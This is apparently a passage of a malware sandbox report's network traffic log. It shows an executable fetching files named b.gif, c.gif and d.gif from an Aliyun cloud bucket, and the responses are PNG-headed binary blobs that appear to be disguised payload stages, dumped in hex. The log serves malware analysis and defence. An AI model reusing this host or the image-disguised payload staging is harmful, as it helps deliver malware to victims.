                                                  2025-01-07 08:59:28 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                                  Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                  2025-01-07 08:59:28 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                                  Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                  2025-01-07 08:59:28 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                                  Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                                  2025-01-07 08:59:28 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                                  Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                                  2025-01-07 08:59:28 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                                  Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.54997939.103.20.934434028C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:29 UTC111OUTGET /b.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 08:59:30 UTC547INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:30 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 125333
                                                  Connection: close
                                                  x-oss-request-id: 677CECF28797BE323597CFFF
                                                  Accept-Ranges: bytes
                                                  ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                  Last-Modified: Tue, 07 Jan 2025 03:43:53 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 10333201072197591521
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                  x-oss-server-time: 35
                                                  2025-01-07 08:59:30 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-07 08:59:30 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                                  Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                  2025-01-07 08:59:30 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                                  Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                  2025-01-07 08:59:30 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                                  Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                  2025-01-07 08:59:30 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                                  Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                  2025-01-07 08:59:30 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                                  Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                  2025-01-07 08:59:30 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                                  Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                  2025-01-07 08:59:30 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                                  Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                  2025-01-07 08:59:30 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                                  Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                  2025-01-07 08:59:30 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                                  Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.54998039.103.20.934434028C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:31 UTC111OUTGET /c.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 08:59:32 UTC545INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:32 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 10681
                                                  Connection: close
                                                  x-oss-request-id: 677CECF36BDBB7333904D5BA
                                                  Accept-Ranges: bytes
                                                  ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                  Last-Modified: Tue, 07 Jan 2025 03:43:52 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 10287299869673359293
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                  x-oss-server-time: 6
                                                  2025-01-07 08:59:32 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-07 08:59:32 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                                  Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                                                  2025-01-07 08:59:32 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                                  Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.54998139.103.20.934434028C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:33 UTC111OUTGET /d.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
